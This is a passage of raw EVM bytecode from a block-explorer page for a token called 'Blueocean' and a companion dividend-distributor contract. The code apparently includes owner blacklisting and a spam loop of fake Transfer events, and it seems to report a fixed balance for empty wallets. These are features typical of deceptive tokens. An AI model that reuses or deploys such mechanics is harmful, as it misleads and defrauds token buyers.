0823190602401602060405180830381865afa1580156114e9573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061150d9190612e37565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015611558573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906114969190612e50565b6000610e2b8284612e6d565b6000610e2b8284612ea2565b6000610e2b8284612d97565b6001600160a01b0383166116025760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610c0e565b6001600160a01b0382166116635760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610c0e565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03821660009081526015602052604090205460ff16151581151514610c56576001600160a01b038216600081815260156020908152604091829020805460ff191685151590811790915591519182527ffed07c88bd5d31bfd0ce77ed7ffdc74a163a61cfc5edcec801e3a7954e33d6e79101611177565b6001600160a01b038381166000908152600160209081526040808320938616835292905220546000198114610d3f57818110156117c15760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610c0e565b610d3f84848484036115a0565b6001600160a01b0383166117f45760405162461bcd60e51b8152600401610c0e90612eb6565b6001600160a01b03821661181a5760405162461bcd60e51b8152600401610c0e90612efb565b8060000361182e5761149683836000611e78565b6001600160a01b03831660009081526015602052604090205460ff1615801561187057506001600160a01b03821660009081526015602052604090205460ff16155b6118ab5760405162461bcd60e51b815260206004820152600c60248201526b125cc8189b1858dadb1a5cdd60a21b6044820152606401610c0e565b6118b58383611fcc565b156118c2576118c261206b565b6118cc8383612304565b15611949577f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316836001600160a01b03161461193b57600061192b6064611925606361191f88610df4565b9061157c565b90611588565b905080821115611939578091505b505b61194683838361236d565b90505b611954838383611e78565b60006011541180156119705750600554600160a01b900460ff16155b1561198057611980601154611d88565b6012546001600160a01b03166119ac57601280546001600160a01b0319166001600160a01b0385161790555b6013546001600160a01b03166119d857601380546001600160a01b0319166001600160a01b0384161790555b6012546001600160a01b031660009081526016602052604090205460ff16158015611a3257506012547f00000000000000000000000000000000000000000000000000000000000000006001600160a01b03908116911614155b15611ab257601254604051637de7a18d60e01b81526001600160a01b0391821660048201527f000000000000000000000000000000000000000000000000000000000000000090911690637de7a18d90602401600060405180830381600087803b158015611a9f57600080fd5b505af1925050508015611ab0575060015b505b6013546001600160a01b031660009081526016602052604090205460ff16158015611b0c57506013547f00000000000000000000000000000000000000000000000000000000000000006001600160a01b03908116911614155b15611b8c57601354604051637de7a18d60e01b81526001600160a01b0391821660048201527f000000000000000000000000000000000000000000000000000000000000000090911690637de7a18d90602401600060405180830381600087803b158015611b7957600080fd5b505af1925050508015611b8a575060015b505b601280546001600160a01b038086166001600160a01b031992831617909255601380549285169290911691909117905560055460ff600160a01b90910416158015611be557506005546001600160a01b03848116911614155b8015611bff57506005546001600160a01b03838116911614155b8015611c1457506001600160a01b0383163014155b8015611cad575042611caa6017547f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663b181b28a6040518163ffffffff1660e01b8152600401602060405180830381865afa158015611c80573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611ca49190612e37565b90611594565b11155b15611496576018546040516001624d3b8760e01b0319815260048101919091527f00000000000000000000000000000000000000000000000000000000000000006001600160a01b03169063ffb2c47990602401600060405180830381600087803b158015611d1b57600080fd5b505af1925050508015611d2c575060015b1561149657505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b60008060005b83811015610d3f57600f54611dae906001600160a01b0316600019612f3e565b600f54909350611dc8906001600160a01b03166001612f64565b600f80546001600160a01b0319166001600160a01b03929092169182179055611df390600019612f3e565b600f54909250611e0d906001600160a01b03166001612f64565b600f80546001600160a01b0319166001600160a01b03928316179055601054604051908152848216918416907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a380611e7081612dc5565b915050611d8e565b6001600160a01b038316611e9e5760405162461bcd60e51b8152600401610c0e90612eb6565b6001600160a01b038216611ec45760405162461bcd60e51b8152600401610c0e90612efb565b6001600160a01b03831660009081526020819052604090205481811015611f3c5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610c0e565b6001600160a01b03808516600090815260208190526040808220858503905591851681529081208054849290611f73908490612d97565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611fbf91815260200190565b60405180910390a3610d3f565b600554600090600160a01b900460ff1615801561201b57507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316836001600160a01b031614155b801561203557506005546001600160a01b03848116911614155b801561204f57506005546001600160a01b03838116911614155b8015610e2b575060065461206230610df4565b10159392505050565b6005805460ff60a01b1916600160a01b1790556009541561209857612091600954612572565b5060006009555b60075415612171577f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663a9059cbb7f00000000000000000000000000000000000000000000000000000000000000006120fb6007546125f3565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015612146573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061216a9190612e50565b5060006007555b6008541561223357600b546008546001600160a01b037f000000000000000000000000000000000000000000000000000000000000000081169263a9059cbb929116906121bd906125f3565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015612208573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061222c9190612e50565b5060006008555b600a54156122f557600c54600a546001600160a01b037f000000000000000000000000000000000000000000000000000000000000000081169263a9059cbb9291169061227f906125f3565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af11580156122ca573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906122ee9190612e50565b506000600a555b6005805460ff60a01b19169055565b6001600160a01b03821660009081526014602052604081205460ff168061234357506001600160a01b03821660009081526014602052604090205460ff165b806123575750600554600160a01b900460ff165b1561236457506000610bde565b50600192915050565b8060006123a06103e8611925847f000000000000000000000000000000000000000000000000000000000000000061157c565b90506123cd857f000000000000000000000000000000000000000000000000000000000000000083611e78565b6123d7828261290e565b9150600061240b6103e8611925867f000000000000000000000000000000000000000000000000000000000000000061157c565b9050806009600082825461241f9190612d97565b9091555061242f9050838261290e565b925060006124636103e8611925877f000000000000000000000000000000000000000000000000000000000000000061157c565b905080600760008282546124779190612d97565b909155506124879050848261290e565b935060006124bb6103e8611925887f000000000000000000000000000000000000000000000000000000000000000061157c565b905080600860008282546124cf9190612d97565b909155506124df9050858261290e565b945060006125266103e861192561251f6124f88c610b57565b7f000000000000000000000000000000000000000000000000000000000000000090611594565b8a9061157c565b905080600a600082825461253a9190612d97565b9091555061254a9050868261290e565b9550612566893061256187611ca486818a8a611594565b611e78565b50505050509392505050565b600080612580836002611588565b9050600061258e848361290e565b9050600061259b836125f3565b90506125a7828261291a565b60408051858152602081018490529081018490529094507f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619060600160405180910390a1505050919050565b60408051600280825260608201835260009283929190602083019080368337019050509050308160008151811061262c5761262c612daf565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000008160018151811061268057612680612daf565b60200260200101906001600160a01b031690816001600160a01b0316815250506126cb307f0000000000000000000000000000000000000000000000000000000000000000856115a0565b604051635c11d79560e01b81526001600160a01b037f00000000000000000000000000000000000000000000000000000000000000001690635c11d7959061274090869060009086907f0000000000000000000000000000000000000000000000000000000000000000904290600401612f8f565b600060405180830381600087803b15801561275a57600080fd5b505af115801561276e573d6000803e3d6000fd5b50506040516370a0823160e01b8152306004820152600092507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031691506370a0823190602401602060405180830381865afa1580156127d9573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906127fd9190612e37565b90507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316633ccfd60b6040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561285a57600080fd5b505af115801561286e573d6000803e3d6000fd5b50506040516370a0823160e01b815230600482015261290692508391506001600160a01b037f000000000000000000000000000000000000000000000000000000000000000016906370a0823190602401602060405180830381865afa1580156128dc573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906129009190612e37565b9061290e565b949350505050565b6000610e2b8284613000565b60405163095ea7b360e01b81526001600160a01b037f000000000000000000000000000000000000000000000000000000000000000081166004830152602482018390526000917f00000000000000000000000000000000000000000000000000000000000000009091169063095ea7b3906044016020604051808303816000875af11580156129ae573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906129d29190612e50565b506129fe307f0000000000000000000000000000000000000000000000000000000000000000856115a0565b600d5460405162e8e33760e81b81523060048201526001600160a01b037f000000000000000000000000000000000000000000000000000000000000000081166024830152604482018690526064820185905260006084830181905260a483015291821660c48201524260e48201527f00000000000000000000000000000000000000000000000000000000000000009091169063e8e3370090610104016060604051808303816000875af1158015612abb573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190612adf9190613017565b95945050505050565b600060208083528351808285015260005b81811015612b1557858101830151858201604001528201612af9565b81811115612b27576000604083870101525b50601f01601f1916929092016040019392505050565b6001600160a01b0381168114610e9b57600080fd5b600060208284031215612b6457600080fd5b8135610e2b81612b3d565b60008060408385031215612b8257600080fd5b8235612b8d81612b3d565b946020939093013593505050565b60008060408385031215612bae57600080fd5b50508035926020909101359150565b8015158114610e9b57600080fd5b60008060408385031215612bde57600080fd5b8235612be981612b3d565b91506020830135612bf981612bbd565b809150509250929050565b600080600060608486031215612c1957600080fd5b8335612c2481612b3d565b92506020840135612c3481612b3d565b929592945050506040919091013590565b600060208284031215612c5757600080fd5b5035919050565b600080600060408486031215612c7357600080fd5b833567ffffffffffffffff80821115612c8b57600080fd5b818601915086601f830112612c9f57600080fd5b813581811115612cae57600080fd5b8760208260051b8501011115612cc357600080fd5b60209283019550935050840135612cd981612bbd565b809150509250925092565b60008060408385031215612cf757600080fd5b8235612d0281612b3d565b91506020830135612bf981612b3d565b600181811c90821680612d2657607f821691505b602082108103612d4657634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b60008219821115612daa57612daa612d81565b500190565b634e487b7160e01b600052603260045260246000fd5b600060018201612dd757612dd7612d81565b5060010190565b6040808252810183905260008460608301825b86811015612e21578235612e0481612b3d565b6001600160a01b0316825260209283019290910190600101612df1565b5080925050508215156020830152949350505050565b600060208284031215612e4957600080fd5b5051919050565b600060208284031215612e6257600080fd5b8151610e2b81612bbd565b6000816000190483118215151615612e8757612e87612d81565b500290565b634e487b7160e01b600052601260045260246000fd5b600082612eb157612eb1612e8c565b500490565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60006001600160a01b0383811680612f5857612f58612e8c565b92169190910492915050565b60006001600160a01b03828116848216808303821115612f8657612f86612d81565b01949350505050565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015612fdf5784516001600160a01b031683529383019391830191600101612fba565b50506001600160a01b03969096166060850152505050608001529392505050565b60008282101561301257613012612d81565b500390565b60008060006060848603121561302c57600080fd5b835192506020840151915060408401519050925092509256fea2646970667358221220dc919364dc39f5f860e02211b5d9ea001bf135cf21a5e13c073954a914c355ab64736f6c634300080d0033608060405234801561001057600080fd5b506040516102bb3803806102bb83398101604081905261002f9161007c565b600080546001600160a01b039384166001600160a01b031991821617909155600180549290931691161790556100af565b80516001600160a01b038116811461007757600080fd5b919050565b6000806040838503121561008f57600080fd5b61009883610060565b91506100a660208401610060565b90509250929050565b6101fd806100be6000396000f3fe608060405234801561001057600080fd5b50600436106100415760003560e01c80632f48ab7d146100465780633ccfd60b14610075578063fc0c546a1461007f575b600080fd5b600154610059906001600160a01b031681565b6040516001600160a01b03909116815260200160405180910390f35b61007d610092565b005b600054610059906001600160a01b031681565b6001546040516370a0823160e01b81523060048201526000916001600160a01b0316906370a0823190602401602060405180830381865afa1580156100db573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906100ff9190610185565b905080156101825760015460005460405163a9059cbb60e01b81526001600160a01b0391821660048201526024810184905291169063a9059cbb906044016020604051808303816000875af115801561015c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610180919061019e565b505b50565b60006020828403121561019757600080fd5b5051919050565b6000602082840312156101b057600080fd5b815180151581146101c057600080fd5b939250505056fea2646970667358221220f089acd21bbdc42329c355bfa77caeac5db54f94b37f3558de3bda0d9fbfcf0a64736f6c634300080d0033608060405234801561001057600080fd5b50604051610cd8380380610cd883398101604081905261002f916100d5565b61003833610069565b600580546001600160a01b039384166001600160a01b03199182161790915560068054929093169116179055610108565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80516001600160a01b03811681146100d057600080fd5b919050565b600080604083850312156100e857600080fd5b6100f1836100b9565b91506100ff602084016100b9565b90509250929050565b610bc1806101176000396000f3fe608060405234801561001057600080fd5b50600436106100b45760003560e01c8063ab377daa11610071578063ab377daa14610136578063b181b28a14610149578063d4fda1f214610152578063df15b11414610172578063f2fde38b14610185578063ffb2c4791461019857600080fd5b80631f888ad8146100b957806326987b60146100c357806349bd5a5e146100df578063715018a61461010a5780637de7a18d146101125780638da5cb5b14610125575b600080fd5b6100c16101ab565b005b6100cc60025481565b6040519081526020015b60405180910390f35b6005546100f2906001600160a01b031681565b6040516001600160a01b0390911681526020016100d6565b6100c16101e5565b6100c1610120366004610a0e565b61021b565b6000546001600160a01b03166100f2565b6100f2610144366004610a37565b6103db565b6100cc60075481565b6100cc610160366004610a0e565b60046020526000908152604090205481565b6006546100f2906001600160a01b031681565b6100c1610193366004610a0e565b610405565b6100c16101a6366004610a37565b61049d565b6000546001600160a01b031633146101de5760405162461bcd60e51b81526004016101d590610a50565b60405180910390fd5b6000600755565b6000546001600160a01b0316331461020f5760405162461bcd60e51b81526004016101d590610a50565b610219600061084a565b565b6000546001600160a01b031633146102455760405162461bcd60e51b81526004016101d590610a50565b6001600160a01b03811660009081526003602052604090205460ff16156102e7576005546040516370a0823160e01b81526001600160a01b038381166004830152909116906370a0823190602401602060405180830381865afa1580156102b0573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906102d49190610a85565b6000036102e4576102e48161089a565b50565b6005546040516370a0823160e01b81526001600160a01b038381166004830152909116906370a0823190602401602060405180830381865afa158015610331573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906103559190610a85565b156102e457600180546001600160a01b03831660008181526004602052604081208390558284018455929092527fb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf60180546001600160a01b03191690911790556001600160a01b0381166000908152600360205260409020805460ff1916600117905550565b600181815481106103eb57600080fd5b6000918252602090912001546001600160a01b0316905081565b6000546001600160a01b0316331461042f5760405162461bcd60e51b81526004016101d590610a50565b6001600160a01b0381166104945760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016101d5565b6102e48161084a565b6000546001600160a01b031633146104c75760405162461bcd60e51b81526004016101d590610a50565b60015460008190036104d7575050565b6006546040516370a0823160e01b81523060048201526000916001600160a01b0316906370a0823190602401602060405180830381865afa158015610520573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105449190610a85565b90506000805a905060005b858310801561055d57508481105b1561084257846002541061057c57505060006002555050426007555050565b60006106a6600560009054906101000a90046001600160a01b03166001600160a01b03166318160ddd6040518163ffffffff1660e01b8152600401602060405180830381865afa1580156105d4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105f89190610a85565b600554600254600180546106a0936001600160a01b0316926370a082319291811061062557610625610a9e565b60009182526020909120015460405160e083901b6001600160e01b03191681526001600160a01b039091166004820152602401602060405180830381865afa158015610675573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106999190610a85565b88906108c4565b906108d7565b9050806000036106db57600280549060006106c083610aca565b919050555081806106d090610aca565b505050505050505050565b6006546040516370a0823160e01b815230600482015282916001600160a01b0316906370a0823190602401602060405180830381865afa158015610723573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107479190610a85565b10156107565750505050505050565b600654600254600180546001600160a01b039093169263a9059cbb9290811061078157610781610a9e565b60009182526020909120015460405160e083901b6001600160e01b03191681526001600160a01b039091166004820152602481018490526044016020604051808303816000875af11580156107da573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107fe9190610ae3565b5061081461080d5a85906108e3565b85906108ef565b93505a60028054919450600061082983610aca565b9190505550818061083990610aca565b9250505061054f565b505050505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6108a3816108fb565b6001600160a01b03166000908152600360205260409020805460ff19169055565b60006108d08284610b05565b9392505050565b60006108d08284610b24565b60006108d08284610b46565b60006108d08284610b5d565b6001805461090a908290610b46565b8154811061091a5761091a610a9e565b60009182526020808320909101546001600160a01b038481168452600490925260409092205460018054929093169291811061095857610958610a9e565b600091825260208083209190910180546001600160a01b0319166001600160a01b039485161790559183168152600491829052604081205460018054919392916109a3908290610b46565b815481106109b3576109b3610a9e565b60009182526020808320909101546001600160a01b0316835282019290925260400190205560018054806109e9576109e9610b75565b600082815260209020810160001990810180546001600160a01b031916905501905550565b600060208284031215610a2057600080fd5b81356001600160a01b03811681146108d057600080fd5b600060208284031215610a4957600080fd5b5035919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b600060208284031215610a9757600080fd5b5051919050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b600060018201610adc57610adc610ab4565b5060010190565b600060208284031215610af557600080fd5b815180151581146108d057600080fd5b6000816000190483118215151615610b1f57610b1f610ab4565b500290565b600082610b4157634e487b7160e01b600052601260045260246000fd5b500490565b600082821015610b5857610b58610ab4565b500390565b60008219821115610b7057610b70610ab4565b500190565b634e487b7160e01b600052603160045260246000fdfea26469706673582212201cb905c625438fe788a67dc156cd8fd9a94bf451b748ea84d4488e85b9ebfea264736f6c634300080d00330000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000014000000000000000000000000000000000000000000000000000038d7ea4c6800000000000000000000000000055d398326f99059ff775485246999027b319795500000000000000000000000010ed43c718714eb63d5aa57b78b54704e256024e00000000000000000000000084dfd0caba1d2ec401bdca8d01c6fc49e1e4e4a5000000000000000000000000ea6c47ddf0415b5df6ea4011d92e4a8496bc4c54000000000000000000000000000000000000000000000000000000000000dead0000000000000000000000000000000000000000000000000000000000000009426c75656f6365616e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009426c75656f6365616e0000000000000000000000000000000000000000000000
Deployed Bytecode
0x60806040526004361061031e5760003560e01c806370d5ae05116101ab578063b2dfeb6b116100f7578063deab8aea11610095578063f82107691161006f578063f821076914610a3b578063f940e38514610a5b578063fce589d814610a7b578063ffd49c8414610aaf57600080fd5b8063deab8aea146109e5578063e2f4560514610a05578063f2fde38b14610a1b57600080fd5b8063cfe0e619116100d1578063cfe0e61914610935578063d46eb1191461094b578063d4e2799a1461097f578063dd62ed3e1461099f57600080fd5b8063b2dfeb6b146108d5578063c0246668146108f5578063c492f0461461091557600080fd5b806395d89b4111610164578063a457c2d71161013e578063a457c2d714610855578063a9059cbb14610875578063af9c53da14610895578063afa4f3b2146108b557600080fd5b806395d89b41146107ec5780639e285bc214610801578063a0b2e1f11461083557600080fd5b806370d5ae051461072f578063715018a61461076357806375f0a874146107785780637d3e3d17146107985780638da5cb5b146107b85780638f2cd2fa146107d657600080fd5b80632c735ef81161026a5780633b2d081c116102235780635d098b38116101fd5780635d098b38146106875780636b67c4df146106a7578063704ce43e146106db57806370a082311461070f57600080fd5b80633b2d081c146105e657806349bd5a5e1461061a5780634fbee1931461064e57600080fd5b80632c735ef8146105115780632f48ab7d14610527578063313ce5671461055b578063333e99db1461057757806336d11c26146105b057806339509351146105c657600080fd5b80631694505e116102d75780631f888ad8116102b15780631f888ad81461048857806323b872dd1461049d5780632bbff348146104bd5780632c1f5216146104dd57600080fd5b80631694505e1461040757806318160ddd146104535780631d0adc071461046857600080fd5b806301c5e3321461032a57806306fdde031461035357806308e6bc5514610375578063095ea7b3146103955780630dd0cc7d146103c5578063153b0d1e146103e757600080fd5b3661032557005b600080fd5b34801561033657600080fd5b50610340600a5481565b6040519081526020015b60405180910390f35b34801561035f57600080fd5b50610368610ac5565b60405161034a9190612ae8565b34801561038157600080fd5b50610340610390366004612b52565b610b57565b3480156103a157600080fd5b506103b56103b0366004612b6f565b610bca565b604051901515815260200161034a565b3480156103d157600080fd5b506103e56103e0366004612b9b565b610be4565b005b3480156103f357600080fd5b506103e5610402366004612bcb565b610c22565b34801561041357600080fd5b5061043b7f00000000000000000000000010ed43c718714eb63d5aa57b78b54704e256024e81565b6040516001600160a01b03909116815260200161034a565b34801561045f57600080fd5b50600254610340565b34801561047457600080fd5b506103e5610483366004612b52565b610c5a565b34801561049457600080fd5b506103e5610ca6565b3480156104a957600080fd5b506103b56104b8366004612c04565b610d45565b3480156104c957600080fd5b50600d5461043b906001600160a01b031681565b3480156104e957600080fd5b5061043b7f0000000000000000000000004ffab08c5d2493862b1988af0d0d7d30dc2e24d181565b34801561051d57600080fd5b50610340600e5481565b34801561053357600080fd5b5061043b7f00000000000000000000000055d398326f99059ff775485246999027b319795581565b34801561056757600080fd5b506040516012815260200161034a565b34801561058357600080fd5b506103b5610592366004612b52565b6001600160a01b031660009081526015602052604090205460ff1690565b3480156105bc57600080fd5b5061034060095481565b3480156105d257600080fd5b506103b56105e1366004612b6f565b610d69565b3480156105f257600080fd5b506103407f000000000000000000000000000000000000000000000000000000000000000581565b34801561062657600080fd5b5061043b7f0000000000000000000000007bc4e35ea2f49328e08a36d7f2fd1dabc9ce6fdb81565b34801561065a57600080fd5b506103b5610669366004612b52565b6001600160a01b031660009081526014602052604090205460ff1690565b34801561069357600080fd5b506103e56106a2366004612b52565b610da8565b3480156106b357600080fd5b506103407f000000000000000000000000000000000000000000000000000000000000001481565b3480156106e757600080fd5b506103407f000000000000000000000000000000000000000000000000000000000000000581565b34801561071b57600080fd5b5061034061072a366004612b52565b610df4565b34801561073b57600080fd5b5061043b7f000000000000000000000000000000000000000000000000000000000000dead81565b34801561076f57600080fd5b506103e5610e32565b34801561078457600080fd5b50600b5461043b906001600160a01b031681565b3480156107a457600080fd5b506103e56107b3366004612c45565b610e68565b3480156107c457600080fd5b506005546001600160a01b031661043b565b3480156107e257600080fd5b5061034060075481565b3480156107f857600080fd5b50610368610e9e565b34801561080d57600080fd5b506103407f000000000000000000000000000000000000000000000000000000000000001481565b34801561084157600080fd5b506103e5610850366004612c45565b610ead565b34801561086157600080fd5b506103b5610870366004612b6f565b610edc565b34801561088157600080fd5b506103b5610890366004612b6f565b610f6e565b3480156108a157600080fd5b506103e56108b0366004612c5e565b610f7c565b3480156108c157600080fd5b506103e56108d0366004612c45565b611058565b3480156108e157600080fd5b506103e56108f0366004612b52565b611087565b34801561090157600080fd5b506103e5610910366004612bcb565b6110d3565b34801561092157600080fd5b506103e5610930366004612c5e565b611183565b34801561094157600080fd5b5061034060085481565b34801561095757600080fd5b5061043b7f000000000000000000000000a1e6d4c66fe8207f5dd605f641a589f803311e7881565b34801561098b57600080fd5b506103e561099a366004612c45565b611252565b3480156109ab57600080fd5b506103406109ba366004612ce4565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b3480156109f157600080fd5b50600c5461043b906001600160a01b031681565b348015610a1157600080fd5b5061034060065481565b348015610a2757600080fd5b506103e5610a36366004612b52565b611362565b348015610a4757600080fd5b506103e5610a56366004612c45565b6113fa565b348015610a6757600080fd5b506103e5610a76366004612ce4565b611429565b348015610a8757600080fd5b506103407f000000000000000000000000000000000000000000000000000000000000000a81565b348015610abb57600080fd5b5061034060175481565b606060038054610ad490612d12565b80601f0160208091040260200160405190810160405280929190818152602001828054610b0090612d12565b8015610b4d5780601f10610b2257610100808354040283529160200191610b4d565b820191906000526020600020905b815481529060010190602001808311610b3057829003601f168201915b5050505050905090565b60007f0000000000000000000000007bc4e35ea2f49328e08a36d7f2fd1dabc9ce6fdb6001600160a01b0316826001600160a01b0316148015610b9c57506000600e54115b8015610bb55750600e54610bb290610708611594565b42105b15610bc2575060f0919050565b506000919050565b600033610bd88185856115a0565b60019150505b92915050565b6005546001600160a01b03163314610c175760405162461bcd60e51b8152600401610c0e90612d4c565b60405180910390fd5b601091909155601155565b6005546001600160a01b03163314610c4c5760405162461bcd60e51b8152600401610c0e90612d4c565b610c5682826116c4565b5050565b6005546001600160a01b03163314610c845760405162461bcd60e51b8152600401610c0e90612d4c565b600c80546001600160a01b0319166001600160a01b0392909216919091179055565b6005546001600160a01b03163314610cd05760405162461bcd60e51b8152600401610c0e90612d4c565b7f0000000000000000000000004ffab08c5d2493862b1988af0d0d7d30dc2e24d16001600160a01b0316631f888ad86040518163ffffffff1660e01b8152600401600060405180830381600087803b158015610d2b57600080fd5b505af1158015610d3f573d6000803e3d6000fd5b50505050565b600033610d53858285611742565b610d5e8585856117ce565b506001949350505050565b3360008181526001602090815260408083206001600160a01b0387168452909152812054909190610bd89082908690610da3908790612d97565b6115a0565b6005546001600160a01b03163314610dd25760405162461bcd60e51b8152600401610c0e90612d4c565b600b80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0381166000818152602081905260408120549091610e195792915050565b60008111610e2957601054610e2b565b805b9392505050565b6005546001600160a01b03163314610e5c5760405162461bcd60e51b8152600401610c0e90612d4c565b610e666000611d36565b565b6005546001600160a01b03163314610e925760405162461bcd60e51b8152600401610c0e90612d4c565b610e9b81611d88565b50565b606060048054610ad490612d12565b6005546001600160a01b03163314610ed75760405162461bcd60e51b8152600401610c0e90612d4c565b600e55565b3360008181526001602090815260408083206001600160a01b038716845290915281205490919083811015610f615760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610c0e565b610d5e82868684036115a0565b600033610bd88185856117ce565b6005546001600160a01b03163314610fa65760405162461bcd60e51b8152600401610c0e90612d4c565b60005b82811015611017578160156000868685818110610fc857610fc8612daf565b9050602002016020810190610fdd9190612b52565b6001600160a01b031681526020810191909152604001600020805460ff19169115159190911790558061100f81612dc5565b915050610fa9565b507f7472bf178ecdf44b66086e67637786c0f1c841e08c3d702843042fdb98443dcb83838360405161104b93929190612dde565b60405180910390a1505050565b6005546001600160a01b031633146110825760405162461bcd60e51b8152600401610c0e90612d4c565b600655565b6005546001600160a01b031633146110b15760405162461bcd60e51b8152600401610c0e90612d4c565b600d80546001600160a01b0319166001600160a01b0392909216919091179055565b6005546001600160a01b031633146110fd5760405162461bcd60e51b8152600401610c0e90612d4c565b6001600160a01b03821660009081526014602052604090205460ff16151581151514610c56576001600160a01b038216600081815260146020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df791015b60405180910390a25050565b6005546001600160a01b031633146111ad5760405162461bcd60e51b8152600401610c0e90612d4c565b60005b8281101561121e5781601460008686858181106111cf576111cf612daf565b90506020020160208101906111e49190612b52565b6001600160a01b031681526020810191909152604001600020805460ff19169115159190911790558061121681612dc5565b9150506111b0565b507f7fdaf542373fa84f4ee8d662c642f44e4c2276a217d7d29e548b6eb29a233b3583838360405161104b93929190612dde565b6005546001600160a01b0316331461127c5760405162461bcd60e51b8152600401610c0e90612d4c565b620186a0811015801561129257506207a1208111155b6112f95760405162461bcd60e51b815260206004820152603260248201527f6469737472696275746f72476173206d757374206265206265747765656e2032604482015271030302c30303020616e64203530302c3030360741b6064820152608401610c0e565b601854810361135d5760405162461bcd60e51b815260206004820152602a60248201527f43616e6e6f7420757064617465206469737472696275746f7247617320746f2060448201526973616d652076616c756560b01b6064820152608401610c0e565b601855565b6005546001600160a01b0316331461138c5760405162461bcd60e51b8152600401610c0e90612d4c565b6001600160a01b0381166113f15760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610c0e565b610e9b81611d36565b6005546001600160a01b031633146114245760405162461bcd60e51b8152600401610c0e90612d4c565b601755565b6005546001600160a01b031633146114535760405162461bcd60e51b8152600401610c0e90612d4c565b6001600160a01b03821661149b576040516001600160a01b038216904780156108fc02916000818181858888f19350505050158015611496573d6000803e3d6000fd5b505050565b6040516370a0823160e01b81523060048201526001600160a01b0383169063a9059cbb90839083906370a0823190602401602060405180830381865afa1580156114e9573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061150d9190612e37565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af11580